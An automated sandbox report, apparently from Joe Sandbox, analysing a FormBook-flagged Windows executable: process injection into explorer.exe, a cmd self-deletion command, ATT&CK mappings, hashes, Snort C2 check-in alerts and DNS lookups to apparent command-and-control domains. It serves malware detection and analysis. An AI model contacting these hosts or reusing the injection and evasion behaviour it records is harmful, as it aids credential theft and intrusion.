            Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3424
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Process created: C:\Users\user\Desktop\OApfyh3Vfm.exe C:\Users\user\Desktop\OApfyh3Vfm.exe
            Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'
            Source: explorer.exe, 00000003.00000000.767323654.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
            Source: explorer.exe, 00000003.00000000.678836866.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.933715263.00000000058F0000.00000002.00020000.sdmp Binary or memory string: Program Manager
            Source: explorer.exe, 00000003.00000000.678836866.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.933715263.00000000058F0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000000.678836866.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.933715263.00000000058F0000.00000002.00020000.sdmp Binary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.678836866.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.933715263.00000000058F0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
            Source: explorer.exe, 00000003.00000000.687471430.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Queries volume information: C:\Users\user\Desktop\OApfyh3Vfm.exe VolumeInformation
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook

            Remote Access Functionality:

            Yara detected FormBook

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Network Connections Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | System Information Discovery 112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            [Figure: behavior graph. Behavior Graph ID: 495803; Sample: OApfyh3Vfm; Startdate: 03/10/2021; Architecture: WINDOWS; Score: 100. Process chain: OApfyh3Vfm.exe (drops C:\Users\user\AppData\...\OApfyh3Vfm.exe.log) started OApfyh3Vfm.exe, which injected into explorer.exe; explorer.exe started NETSTAT.EXE, which started cmd.exe, which started conhost.exe.]


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            OApfyh3Vfm.exe | 49% | Virustotal |
            OApfyh3Vfm.exe | 37% | Metadefender |
            OApfyh3Vfm.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            2.2.OApfyh3Vfm.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            Source | Detection | Scanner | Label
            ninetofivetheses.com | 0% | Virustotal |
            www.zoonseo.com | 0% | Virustotal |
            td-balancer-euw2-6-109.wixdns.net | 0% | Virustotal |

            URLs


            Domains and IPs

            Contacted Domains


                                          Contacted URLs


                                          URLs from Memory and Binaries

                                          Name: https://bemebee.com/shjn?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko
                                          Source: NETSTAT.EXE, 00000008.00000002.933459913.0000000003B52000.00000004.00020000.sdmp
                                          Malicious: false
                                          Antivirus Detection: Avira URL Cloud: safe
                                          Reputation: unknown

                                          Contacted IPs


                                          Public


                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:495803
                                          Start date:03.10.2021
                                          Start time:09:55:29
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 49s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:OApfyh3Vfm (renamed file extension from none to exe)
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:21
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/1@19/7
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 16.9% (good quality ratio 14.9%)
                                          • Quality average: 71.8%
                                          • Quality standard deviation: 32.7%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 116
                                          • Number of non-executed functions: 158
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 40.126.31.143, 40.126.31.135, 20.190.159.136, 40.126.31.6, 40.126.31.141, 40.126.31.139, 20.190.159.134, 20.190.159.132, 20.82.210.154, 95.100.218.79, 209.197.3.8, 20.50.102.62, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60
                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, www.tm.lg.prod.aadmsa.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes were analyzed, report is missing behavior information

                                          Simulations

                                          Behavior and APIs

                                          Time: 09:56:29
                                          Type: API Interceptor
                                          Description: 1x Sleep call for process: OApfyh3Vfm.exe modified

                                          Joe Sandbox View / Context

                                          IPs


                                          Domains

                                          No context

                                          ASN


                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OApfyh3Vfm.exe.log
                                          Process:C:\Users\user\Desktop\OApfyh3Vfm.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.355304211458859
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.183911608810652
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:OApfyh3Vfm.exe
                                          File size:536576
                                          MD5:015d157c73a9a51f0a3745a028d3abce
                                          SHA1:594e74fe551ee2e3dcb7cef570792ee2e944b166
                                          SHA256:4633bc441c059884886be83a8733f355d933b58db80f81c0a56404bceadf9667
                                          SHA512:5ab63cdec449ca99e5f5cb5941ac9fa8cdee7f51a8430240c3cc033f141041286e4974b5c873b5b0aea021adcb7828048e2736fce7132811d2d99a47e98c1bbc
                                          SSDEEP:12288:uAUNi+hBr7IUAvHioJvR/WF9Tp9Z94W+UHuUAGr8RHj/tu:fUNi+hBr8UAvCs1WN9n4BUOU7r8
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nSa..............0..&...........D... ...`....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x4844c2
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x61536EEF [Tue Sep 28 19:37:19 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al

                                          Data Directories

                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84470 | 0x4f | .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x86000 | 0x5f8 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x88000 | 0xc | .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x2000 | 0x824c8 | 0x82600 | False | 0.768003205896 | data | 7.19443434892 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc | 0x86000 | 0x5f8 | 0x600 | False | 0.4453125 | data | 4.19635733319 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc | 0x88000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name | RVA | Size | Type | Language | Country
                                          RT_VERSION | 0x86090 | 0x368 | data | |
                                          RT_MANIFEST | 0x86408 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                          Imports

                                          DLL | Import
                                          mscoree.dll | _CorExeMain

                                          Version Infos

                                          Description | Data
                                          Translation | 0x0000 0x04b0
                                          LegalCopyright | Copyright 2016
                                          Assembly Version | 1.0.0.0
                                          InternalName | SearchDa.exe
                                          FileVersion | 1.1.0.0
                                          CompanyName | Paradoxlost
                                          LegalTrademarks |
                                          Comments |
                                          ProductName | Paradoxlost UX
                                          ProductVersion | 1.1.0
                                          FileDescription | Paradoxlost WinForms Theme Engine
                                          OriginalFilename | SearchDa.exe

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                          10/03/21-09:57:43.803239 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49815 | 80 | 192.168.2.4 | 35.246.6.109
                                          10/03/21-09:57:43.803239 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49815 | 80 | 192.168.2.4 | 35.246.6.109
                                          10/03/21-09:57:43.803239 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49815 | 80 | 192.168.2.4 | 35.246.6.109
                                          10/03/21-09:57:54.111169 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
                                          10/03/21-09:58:23.928078 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49844 | 34.102.136.180 | 192.168.2.4
                                          10/03/21-09:58:39.497927 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49847 | 80 | 192.168.2.4 | 173.231.37.12
                                          10/03/21-09:58:39.497927 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49847 | 80 | 192.168.2.4 | 173.231.37.12
                                          10/03/21-09:58:39.497927 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49847 | 80 | 192.168.2.4 | 173.231.37.12
                                          10/03/21-09:58:48.465644 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
                                          10/03/21-09:58:49.467229 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
                                          10/03/21-09:58:55.417362 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
                                          10/03/21-09:58:59.352432 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49896 | 80 | 192.168.2.4 | 199.59.242.153
                                          10/03/21-09:58:59.352432 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49896 | 80 | 192.168.2.4 | 199.59.242.153
                                          10/03/21-09:58:59.352432 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49896 | 80 | 192.168.2.4 | 199.59.242.153

                                          Network Port Distribution

                                          TCP Packets


                                          UDP Packets


                                          ICMP Packets

                                          Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                          Oct 3, 2021 09:57:54.111169100 CEST | 192.168.2.4 | 8.8.8.8 | cff5 | (Port unreachable) | Destination Unreachable
                                          Oct 3, 2021 09:58:48.465643883 CEST | 192.168.2.4 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable
                                          Oct 3, 2021 09:58:49.467228889 CEST | 192.168.2.4 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable
                                          Oct 3, 2021 09:58:55.417361975 CEST | 192.168.2.4 | 8.8.8.8 | cff2 | (Port unreachable) | Destination Unreachable

                                          DNS Queries

                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                          Oct 3, 2021 09:57:38.683191061 CEST | 192.168.2.4 | 8.8.8.8 | 0xdd18 | Standard query (0) | www.agora.markets | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:43.724562883 CEST | 192.168.2.4 | 8.8.8.8 | 0xb85 | Standard query (0) | www.hartfulcleaning.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:48.912702084 CEST | 192.168.2.4 | 8.8.8.8 | 0xc3bc | Standard query (0) | www.sakuratyu.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:49.955838919 CEST | 192.168.2.4 | 8.8.8.8 | 0xc3bc | Standard query (0) | www.sakuratyu.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:50.971491098 CEST | 192.168.2.4 | 8.8.8.8 | 0xc3bc | Standard query (0) | www.sakuratyu.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:57.379009962 CEST | 192.168.2.4 | 8.8.8.8 | 0x7aaf | Standard query (0) | www.qumpan.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:02.466120005 CEST | 192.168.2.4 | 8.8.8.8 | 0x4d57 | Standard query (0) | www.2ed58fwec.xyz | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:08.503768921 CEST | 192.168.2.4 | 8.8.8.8 | 0xcd7b | Standard query (0) | www.factechcolombia.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:18.691266060 CEST | 192.168.2.4 | 8.8.8.8 | 0x60da | Standard query (0) | www.sakina.digital | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:23.776633024 CEST | 192.168.2.4 | 8.8.8.8 | 0x8b5f | Standard query (0) | www.ninetofivetheses.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:28.948040962 CEST | 192.168.2.4 | 8.8.8.8 | 0x383 | Standard query (0) | www.privatelymeeting.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:34.054457903 CEST | 192.168.2.4 | 8.8.8.8 | 0xa84e | Standard query (0) | www.anamentor.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:39.134401083 CEST | 192.168.2.4 | 8.8.8.8 | 0xd27c | Standard query (0) | www.zoonseo.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:45.025994062 CEST | 192.168.2.4 | 8.8.8.8 | 0xce18 | Standard query (0) | www.noordinarybusiness.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:46.039237976 CEST | 192.168.2.4 | 8.8.8.8 | 0xce18 | Standard query (0) | www.noordinarybusiness.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:47.039262056 CEST | 192.168.2.4 | 8.8.8.8 | 0xce18 | Standard query (0) | www.noordinarybusiness.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:52.571595907 CEST | 192.168.2.4 | 8.8.8.8 | 0x3870 | Standard query (0) | www.njhude.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:53.570835114 CEST | 192.168.2.4 | 8.8.8.8 | 0x3870 | Standard query (0) | www.njhude.com | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:59.104794979 CEST | 192.168.2.4 | 8.8.8.8 | 0x2f17 | Standard query (0) | www.modernmpm.com | A (IP address) | IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          Oct 3, 2021 09:56:21.463624001 CEST | 8.8.8.8 | 192.168.2.4 | 0xd38b | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 3, 2021 09:57:38.708153963 CEST | 8.8.8.8 | 192.168.2.4 | 0xdd18 | Name error (3) | www.agora.markets | none | none | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST | 8.8.8.8 | 192.168.2.4 | 0xb85 | No error (0) | www.hartfulcleaning.com | www65.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST | 8.8.8.8 | 192.168.2.4 | 0xb85 | No error (0) | www65.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST | 8.8.8.8 | 192.168.2.4 | 0xb85 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST | 8.8.8.8 | 192.168.2.4 | 0xb85 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST | 8.8.8.8 | 192.168.2.4 | 0xb85 | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:52.341748953 CEST | 8.8.8.8 | 192.168.2.4 | 0xc3bc | Server failure (2) | www.sakuratyu.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:54.111011982 CEST | 8.8.8.8 | 192.168.2.4 | 0xc3bc | Server failure (2) | www.sakuratyu.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:54.357109070 CEST | 8.8.8.8 | 192.168.2.4 | 0xc3bc | Server failure (2) | www.sakuratyu.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:57:57.399893999 CEST | 8.8.8.8 | 192.168.2.4 | 0x7aaf | No error (0) | www.qumpan.com | | 46.38.243.234 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:02.794513941 CEST | 8.8.8.8 | 192.168.2.4 | 0x4d57 | No error (0) | www.2ed58fwec.xyz | | 156.225.2.209 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:08.539320946 CEST | 8.8.8.8 | 192.168.2.4 | 0xcd7b | No error (0) | www.factechcolombia.com | factechcolombia.com | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 3, 2021 09:58:08.539320946 CEST | 8.8.8.8 | 192.168.2.4 | 0xcd7b | No error (0) | factechcolombia.com | | 81.88.48.71 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:18.714468002 CEST | 8.8.8.8 | 192.168.2.4 | 0x60da | No error (0) | www.sakina.digital | sakina.digital | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 3, 2021 09:58:18.714468002 CEST | 8.8.8.8 | 192.168.2.4 | 0x60da | No error (0) | sakina.digital | | 81.169.145.74 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:23.796281099 CEST | 8.8.8.8 | 192.168.2.4 | 0x8b5f | No error (0) | www.ninetofivetheses.com | ninetofivetheses.com | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 3, 2021 09:58:23.796281099 CEST | 8.8.8.8 | 192.168.2.4 | 0x8b5f | No error (0) | ninetofivetheses.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:28.992896080 CEST | 8.8.8.8 | 192.168.2.4 | 0x383 | No error (0) | www.privatelymeeting.com | | 213.186.33.5 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:34.075911045 CEST | 8.8.8.8 | 192.168.2.4 | 0xa84e | No error (0) | www.anamentor.com | | 104.21.51.95 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:34.075911045 CEST | 8.8.8.8 | 192.168.2.4 | 0xa84e | No error (0) | www.anamentor.com | | 172.67.178.31 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:39.307363987 CEST | 8.8.8.8 | 192.168.2.4 | 0xd27c | No error (0) | www.zoonseo.com | | 173.231.37.12 | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:47.554116964 CEST | 8.8.8.8 | 192.168.2.4 | 0xce18 | Server failure (2) | www.noordinarybusiness.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:48.465555906 CEST | 8.8.8.8 | 192.168.2.4 | 0xce18 | Server failure (2) | www.noordinarybusiness.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:49.467149019 CEST | 8.8.8.8 | 192.168.2.4 | 0xce18 | Server failure (2) | www.noordinarybusiness.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:54.089746952 CEST | 8.8.8.8 | 192.168.2.4 | 0x3870 | Server failure (2) | www.njhude.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:55.417242050 CEST | 8.8.8.8 | 192.168.2.4 | 0x3870 | Server failure (2) | www.njhude.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 3, 2021 09:58:59.208343029 CEST | 8.8.8.8 | 192.168.2.4 | 0x2f17 | No error (0) | www.modernmpm.com | | 199.59.242.153 | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.hartfulcleaning.com
                                          • www.qumpan.com
                                          • www.2ed58fwec.xyz
                                          • www.factechcolombia.com
